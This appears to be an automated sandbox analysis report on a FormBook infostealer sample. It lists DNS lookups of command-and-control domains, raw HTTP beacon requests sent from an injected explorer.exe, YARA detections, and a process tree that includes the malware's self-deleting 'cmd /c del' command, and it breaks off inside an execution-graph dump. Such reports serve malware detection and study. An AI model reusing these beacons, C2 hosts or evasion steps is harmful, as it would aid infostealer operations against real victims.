Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 3, 2024 08:47:32.724881887 CEST | 62837 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:47:32.960675001 CEST | 53 | 62837 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:47:53.092926025 CEST | 53846 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:47:53.500461102 CEST | 53 | 53846 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:48:13.369723082 CEST | 54806 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:48:13.634320021 CEST | 53 | 54806 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:48:33.693263054 CEST | 59068 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:48:33.813359976 CEST | 53 | 59068 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:48:54.235616922 CEST | 61214 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:48:54.382339954 CEST | 53 | 61214 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:49:35.382862091 CEST | 50609 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:49:35.934587955 CEST | 53 | 50609 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:49:56.003293991 CEST | 54356 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:49:56.138266087 CEST | 53 | 54356 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:50:16.545780897 CEST | 57611 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:50:16.685075045 CEST | 53 | 57611 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:50:37.119311094 CEST | 57113 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:50:37.292650938 CEST | 53 | 57113 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:50:57.677490950 CEST | 56924 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:50:57.814774990 CEST | 53 | 56924 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:51:18.188425064 CEST | 63282 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:51:18.326195955 CEST | 53 | 63282 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:51:38.746418953 CEST | 55862 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:51:38.885360956 CEST | 53 | 55862 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:51:59.273076057 CEST | 55296 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:51:59.479312897 CEST | 53 | 55296 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:52:19.815931082 CEST | 56784 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:52:19.974755049 CEST | 53 | 56784 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:52:40.373543024 CEST | 59970 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:52:40.552776098 CEST | 53 | 59970 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:53:03.212203026 CEST | 59583 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:53:03.382316113 CEST | 53 | 59583 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:53:21.458201885 CEST | 60116 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:53:21.648458958 CEST | 53 | 60116 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:53:41.969305038 CEST | 59011 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:53:42.181104898 CEST | 53 | 59011 | 1.1.1.1 | 192.168.11.20
Jun 3, 2024 08:54:02.496020079 CEST | 52839 | 53 | 192.168.11.20 | 1.1.1.1
Jun 3, 2024 08:54:03.511154890 CEST | 52839 | 53 | 192.168.11.20 | 9.9.9.9
Jun 3, 2024 08:54:03.913429976 CEST | 53 | 52839 | 9.9.9.9 | 192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:54:04.014054060 CEST53528391.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:54:23.022850990 CEST5895153192.168.11.209.9.9.9
                                                                                                                                                                                                      Jun 3, 2024 08:54:23.153611898 CEST53589519.9.9.9192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:55:06.289402008 CEST6259453192.168.11.209.9.9.9
                                                                                                                                                                                                      Jun 3, 2024 08:55:06.421761036 CEST53625949.9.9.9192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:55:25.243534088 CEST5374453192.168.11.209.9.9.9
                                                                                                                                                                                                      Jun 3, 2024 08:55:25.373941898 CEST53537449.9.9.9192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 3, 2024 08:47:32.724881887 CEST | 192.168.11.20 | 1.1.1.1 | 0xc5d0 | Standard query (0) | www.bolinkpass.club | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:47:53.092926025 CEST | 192.168.11.20 | 1.1.1.1 | 0x385d | Standard query (0) | www.spiritualpath.info | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:48:13.369723082 CEST | 192.168.11.20 | 1.1.1.1 | 0x4d2 | Standard query (0) | www.sugardefender24-usa.us | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:48:33.693263054 CEST | 192.168.11.20 | 1.1.1.1 | 0x5ad8 | Standard query (0) | www.nff1291.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:48:54.235616922 CEST | 192.168.11.20 | 1.1.1.1 | 0xaa58 | Standard query (0) | www.henslotalt.us | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:49:35.382862091 CEST | 192.168.11.20 | 1.1.1.1 | 0x650f | Standard query (0) | www.65302.vip | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:49:56.003293991 CEST | 192.168.11.20 | 1.1.1.1 | 0xb679 | Standard query (0) | www.lotusluxecandle.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:16.545780897 CEST | 192.168.11.20 | 1.1.1.1 | 0x6b21 | Standard query (0) | www.carneden.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:37.119311094 CEST | 192.168.11.20 | 1.1.1.1 | 0x30f | Standard query (0) | www.pedandmore.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:57.677490950 CEST | 192.168.11.20 | 1.1.1.1 | 0x2100 | Standard query (0) | www.junongpei.website | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:51:18.188425064 CEST | 192.168.11.20 | 1.1.1.1 | 0x5a67 | Standard query (0) | www.winningpickleballshots.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:51:38.746418953 CEST | 192.168.11.20 | 1.1.1.1 | 0x45d9 | Standard query (0) | www.thetrendingproduct.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:51:59.273076057 CEST | 192.168.11.20 | 1.1.1.1 | 0x7329 | Standard query (0) | www.veryaroma.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:52:19.815931082 CEST | 192.168.11.20 | 1.1.1.1 | 0xf1c5 | Standard query (0) | www.epuar.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:52:40.373543024 CEST | 192.168.11.20 | 1.1.1.1 | 0x6a83 | Standard query (0) | www.warehouse-inventory-80963.bond | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:53:03.212203026 CEST | 192.168.11.20 | 1.1.1.1 | 0xfe8f | Standard query (0) | www.jfgminimalist.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:53:21.458201885 CEST | 192.168.11.20 | 1.1.1.1 | 0x9936 | Standard query (0) | www.ferradaoffroad.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:53:41.969305038 CEST | 192.168.11.20 | 1.1.1.1 | 0x97f5 | Standard query (0) | www.free-cell-phones-en-arena.sbs | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:54:02.496020079 CEST | 192.168.11.20 | 1.1.1.1 | 0x24ae | Standard query (0) | www.84031.vip | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:54:03.511154890 CEST | 192.168.11.20 | 9.9.9.9 | 0x24ae | Standard query (0) | www.84031.vip | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:54:23.022850990 CEST | 192.168.11.20 | 9.9.9.9 | 0x91aa | Standard query (0) | www.lotusluxecandle.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:55:06.289402008 CEST | 192.168.11.20 | 9.9.9.9 | 0x3f73 | Standard query (0) | www.footresort.com | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:55:25.243534088 CEST | 192.168.11.20 | 9.9.9.9 | 0x4d9c | Standard query (0) | www.priuswuxi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 3, 2024 08:47:32.960675001 CEST | 1.1.1.1 | 192.168.11.20 | 0xc5d0 | No error (0) | www.bolinkpass.club | | 103.224.212.213 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:47:53.500461102 CEST | 1.1.1.1 | 192.168.11.20 | 0x385d | No error (0) | www.spiritualpath.info | | 172.67.182.124 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:47:53.500461102 CEST | 1.1.1.1 | 192.168.11.20 | 0x385d | No error (0) | www.spiritualpath.info | | 104.21.67.232 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:48:13.634320021 CEST | 1.1.1.1 | 192.168.11.20 | 0x4d2 | No error (0) | www.sugardefender24-usa.us | www.sugardefender24-usa.us.cdn.hstgr.net | | CNAME (Canonical name) | IN (0x0001) | false
Jun 3, 2024 08:48:13.634320021 CEST | 1.1.1.1 | 192.168.11.20 | 0x4d2 | No error (0) | www.sugardefender24-usa.us.cdn.hstgr.net | | 84.32.84.251 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:48:33.813359976 CEST | 1.1.1.1 | 192.168.11.20 | 0x5ad8 | Name error (3) | www.nff1291.com | none | none | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:48:54.382339954 CEST | 1.1.1.1 | 192.168.11.20 | 0xaa58 | No error (0) | www.henslotalt.us | | 172.67.158.76 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:48:54.382339954 CEST | 1.1.1.1 | 192.168.11.20 | 0xaa58 | No error (0) | www.henslotalt.us | | 104.21.57.17 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:49:35.934587955 CEST | 1.1.1.1 | 192.168.11.20 | 0x650f | No error (0) | www.65302.vip | fq.54cdn.vip | | CNAME (Canonical name) | IN (0x0001) | false
Jun 3, 2024 08:49:35.934587955 CEST | 1.1.1.1 | 192.168.11.20 | 0x650f | No error (0) | fq.54cdn.vip | | 40.81.24.207 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:49:56.138266087 CEST | 1.1.1.1 | 192.168.11.20 | 0xb679 | Name error (3) | www.lotusluxecandle.com | none | none | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:16.685075045 CEST | 1.1.1.1 | 192.168.11.20 | 0x6b21 | No error (0) | www.carneden.com | carneden.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 3, 2024 08:50:16.685075045 CEST | 1.1.1.1 | 192.168.11.20 | 0x6b21 | No error (0) | carneden.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:16.685075045 CEST | 1.1.1.1 | 192.168.11.20 | 0x6b21 | No error (0) | carneden.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:37.292650938 CEST | 1.1.1.1 | 192.168.11.20 | 0x30f | No error (0) | www.pedandmore.com | | 103.169.142.0 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:57.814774990 CEST | 1.1.1.1 | 192.168.11.20 | 0x2100 | No error (0) | www.junongpei.website | | 104.21.11.125 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:50:57.814774990 CEST | 1.1.1.1 | 192.168.11.20 | 0x2100 | No error (0) | www.junongpei.website | | 172.67.166.8 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:51:18.326195955 CEST | 1.1.1.1 | 192.168.11.20 | 0x5a67 | No error (0) | www.winningpickleballshots.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 3, 2024 08:51:18.326195955 CEST | 1.1.1.1 | 192.168.11.20 | 0x5a67 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:51:38.885360956 CEST | 1.1.1.1 | 192.168.11.20 | 0x45d9 | Name error (3) | www.thetrendingproduct.com | none | none | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:51:59.479312897 CEST | 1.1.1.1 | 192.168.11.20 | 0x7329 | No error (0) | www.veryaroma.com | | 172.67.185.213 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:51:59.479312897 CEST | 1.1.1.1 | 192.168.11.20 | 0x7329 | No error (0) | www.veryaroma.com | | 104.21.59.244 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:52:19.974755049 CEST | 1.1.1.1 | 192.168.11.20 | 0xf1c5 | Name error (3) | www.epuar.com | none | none | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:52:40.552776098 CEST | 1.1.1.1 | 192.168.11.20 | 0x6a83 | No error (0) | www.warehouse-inventory-80963.bond | | 104.247.81.94 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:53:03.382316113 CEST | 1.1.1.1 | 192.168.11.20 | 0xfe8f | Name error (3) | www.jfgminimalist.com | none | none | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:53:21.648458958 CEST | 1.1.1.1 | 192.168.11.20 | 0x9936 | No error (0) | www.ferradaoffroad.com | ferradaoffroad.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 3, 2024 08:53:21.648458958 CEST | 1.1.1.1 | 192.168.11.20 | 0x9936 | No error (0) | ferradaoffroad.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:53:21.648458958 CEST | 1.1.1.1 | 192.168.11.20 | 0x9936 | No error (0) | ferradaoffroad.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:53:42.181104898 CEST | 1.1.1.1 | 192.168.11.20 | 0x97f5 | No error (0) | www.free-cell-phones-en-arena.sbs | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:54:03.913429976 CEST | 9.9.9.9 | 192.168.11.20 | 0x24ae | No error (0) | www.84031.vip | fq.54cdn.vip | | CNAME (Canonical name) | IN (0x0001) | false
Jun 3, 2024 08:54:03.913429976 CEST | 9.9.9.9 | 192.168.11.20 | 0x24ae | No error (0) | fq.54cdn.vip | | 40.81.24.207 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:54:04.014054060 CEST | 1.1.1.1 | 192.168.11.20 | 0x24ae | No error (0) | www.84031.vip | fq.54cdn.vip | | CNAME (Canonical name) | IN (0x0001) | false
Jun 3, 2024 08:54:04.014054060 CEST | 1.1.1.1 | 192.168.11.20 | 0x24ae | No error (0) | fq.54cdn.vip | | 40.81.24.207 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:54:23.153611898 CEST | 9.9.9.9 | 192.168.11.20 | 0x91aa | Name error (3) | www.lotusluxecandle.com | none | none | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:55:06.421761036 CEST | 9.9.9.9 | 192.168.11.20 | 0x3f73 | No error (0) | www.footresort.com | | 66.94.112.248 | A (IP address) | IN (0x0001) | false
Jun 3, 2024 08:55:25.373941898 CEST | 9.9.9.9 | 192.168.11.20 | 0x4d9c | Name error (3) | www.priuswuxi.com | none | none | A (IP address) | IN (0x0001) | false
• www.bolinkpass.club
• www.spiritualpath.info

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 50410 | 103.224.212.213 | 80 | 5272 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jun 3, 2024 08:47:33.122865915 CEST | 170 | OUT | GET /cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs HTTP/1.1
Host: www.bolinkpass.club
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 3, 2024 08:47:33.339585066 CEST | 434 | IN | HTTP/1.1 302 Found
date: Mon, 03 Jun 2024 06:47:33 GMT
server: Apache
set-cookie: __tad=1717397253.7977802; expires=Thu, 01-Jun-2034 06:47:33 GMT; Max-Age=315360000
location: http://ww25.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs&subid1=20240603-1647-3337-88d0-915e9f29f59e
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 50411 | 172.67.182.124 | 80 | 5272 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jun 3, 2024 08:47:53.631791115 CEST | 173 | OUT | GET /cr12/?XDHHT=EMrw1bwJWliw0FwpqVXnoYhnVkfUleLKpzdhUAtZvcFg+78qkpfmZQ0FVMWvYMkzI5s2&MZt0=njKl2H4htFXPs HTTP/1.1
Host: www.spiritualpath.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Target ID: 3
Start time: 02:46:36
Start date: 03/06/2024
Path: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
Imagebase: 0xa60000
File size: 814'592 bytes
MD5 hash: 6C73961037087D34597FC8A582388BCC
Has elevated privileges: true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:02:46:49
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\yPURXYpFVuXra2o.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
                                                                                                                                                                                                      Imagebase:0xd20000
                                                                                                                                                                                                      File size:814'592 bytes
                                                                                                                                                                                                      MD5 hash:6C73961037087D34597FC8A582388BCC
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:02:46:49
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                      Imagebase:0x7ff728d00000
                                                                                                                                                                                                      File size:4'849'904 bytes
                                                                                                                                                                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.35236192272.0000000013989000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:02:46:58
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\cscript.exe"
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:144'896 bytes
                                                                                                                                                                                                      MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                      Start time:02:47:01
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:/c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
                                                                                                                                                                                                      Imagebase:0x740000
                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                      Start time:02:47:01
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff793de0000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:true


                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:15.5%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:140
                                                                                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                                                                                        execution_graph 13944 6c651ee 13949 6c65bc6 13944->13949 13967 6c65b60 13944->13967 13984 6c65b50 13944->13984 13945 6c651fd 13950 6c65b54 13949->13950 13951 6c65bc9 13949->13951 14001 6c65f07 13950->14001 14006 6c6617c 13950->14006 14011 6c6605f 13950->14011 14016 6c66931 13950->14016 14021 6c65fd1 13950->14021 14026 6c660d2 13950->14026 14030 6c66255 13950->14030 14035 6c66376 13950->14035 14040 6c666c8 13950->14040 14045 6c661ad 13950->14045 14050 6c6646c 13950->14050 14054 6c66382 13950->14054 14058 6c65f65 13950->14058 14063 6c66307 13950->14063 13952 6c65b82 13952->13945 13968 6c65b7a 13967->13968 13970 6c65f07 2 API calls 13968->13970 13971 6c66307 2 API calls 13968->13971 13972 6c65f65 2 API calls 13968->13972 13973 6c66382 2 API calls 13968->13973 13974 6c6646c 2 API calls 13968->13974 13975 6c661ad 2 API calls 13968->13975 13976 6c666c8 2 API calls 13968->13976 13977 6c66376 2 API calls 13968->13977 13978 6c66255 2 API calls 13968->13978 13979 6c660d2 2 API calls 13968->13979 13980 6c65fd1 2 API calls 13968->13980 13981 6c66931 2 API calls 13968->13981 13982 6c6605f 2 API calls 13968->13982 13983 6c6617c 2 API calls 13968->13983 13969 6c65b82 13969->13945 13970->13969 13971->13969 13972->13969 13973->13969 13974->13969 13975->13969 13976->13969 13977->13969 13978->13969 13979->13969 13980->13969 13981->13969 13982->13969 13983->13969 13985 6c65b54 13984->13985 13987 6c65f07 2 API calls 13985->13987 13988 6c66307 2 API calls 13985->13988 13989 6c65f65 2 API calls 13985->13989 13990 6c66382 2 API calls 13985->13990 13991 6c6646c 2 API calls 13985->13991 13992 6c661ad 2 API 